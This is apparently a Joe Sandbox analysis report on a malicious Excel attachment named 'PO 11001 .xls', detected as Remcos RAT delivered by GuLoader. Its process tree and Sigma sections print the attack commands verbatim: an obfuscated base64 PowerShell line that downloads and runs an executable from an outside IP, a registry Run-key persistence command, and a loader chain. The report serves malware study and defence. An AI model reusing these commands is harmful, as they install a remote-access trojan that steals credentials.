Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO 11001 .xls

Overview

General Information

Sample name:PO 11001 .xls
Analysis ID:1522508
MD5:c032108824b5b2e9075e6216300794ad
SHA1:f7517cdb21e84b14cc8b0a6bd7de1aa2d5804568
SHA256:eee751a9781787e72e2666b344b5262abac000f1abc8a090af60b574401e6b79
Tags:xlsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sample uses process hollowing technique
Searches for Windows Mail specific files
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: System File Execution Location Anomaly
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3660 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3924 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 4008 cmdline: "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 4032 cmdline: PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3152 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3168 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA499.tmp" "c:\Users\user\AppData\Local\Temp\sm41lsyu\CSCE0CED41DA99B458392766F6BC82F0D5.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • dllhost.exe (PID: 3308 cmdline: "C:\Users\user\AppData\Roaming\dllhost.exe" MD5: 450228D72F9F726B645C55BBBC6DB905)
            • powershell.exe (PID: 3388 cmdline: "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
              • Vaccinerende.exe (PID: 924 cmdline: "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • cmd.exe (PID: 1908 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)" MD5: AD7B9C14083B52BC532FBA5948342B98)
                  • reg.exe (PID: 3084 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)" MD5: D69A9ABBB0D795F21995C2F48C1EB560)
                • Vaccinerende.exe (PID: 4028 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\uufpqcznfpbrpkbrchvwvbbgmplrtlta" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 4008 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wwta" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 2740 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\hrysrnv" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 1308 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jypyihgkg" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 2192 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tsdrjareurci" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 3596 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wvibksbfizuvagm" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 2420 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\iwmakfxbvkkvnuhajheo" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 3920 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\krsslxicrscipavesrrqbfdw" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 2512 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\vtxdlqtwfaunaojibclrekqfvdn" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 2992 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\myrqksteqvbcbpuimnlztpdvy" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 3472 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\xtwidkeyedthlwimexyaecymzxube" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 1872 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\zvbbddpzsllmnceqnitchhsvidlcgnnv" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 332 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jghbahqihjysxfkijlbzkstdovyth" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 1876 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tamubzacvrqfilguawnanwnuwchuixxt" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 1820 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dcam" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 1908 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\ctsuyeuksgddrommozvfphobcmulr" MD5: 450228D72F9F726B645C55BBBC6DB905)
    • mshta.exe (PID: 1852 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 1392 cmdline: "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 2372 cmdline: PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3584 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3424 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF72C.tmp" "c:\Users\user\AppData\Local\Temp\r4gn3nq1\CSCA7279739985342FFA8B6946FD4222CB8.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • dllhost.exe (PID: 1536 cmdline: "C:\Users\user\AppData\Roaming\dllhost.exe" MD5: 450228D72F9F726B645C55BBBC6DB905)
            • powershell.exe (PID: 2596 cmdline: "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
              • Vaccinerende.exe (PID: 3116 cmdline: "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe" MD5: 450228D72F9F726B645C55BBBC6DB905)
  • powershell.exe (PID: 3852 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Frligheden) MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • powershell.exe (PID: 1848 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
  • powershell.exe (PID: 1504 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Frligheden) MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • powershell.exe (PID: 3752 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000021.00000002.1004764696.0000000006AA4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000018.00000002.1008062874.0000000009B56000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      0000000C.00000002.808389221.0000000009888000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: Vaccinerende.exe PID: 3116JoeSecurity_RemcosYara detected Remcos RATJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: File With Uncommon Extension Created By An Office Application
          Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3660, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cookienetbookinetcahce[1].hta
          Sigma detected: Files With System Process Name In Unsuspected Locations
          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4032, TargetFilename: C:\Users\user\AppData\Roaming\dllhost.exe
          Sigma detected: Suspicious MSHTA Child Process
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICA
          Sigma detected: Suspicious Microsoft Office Child Process
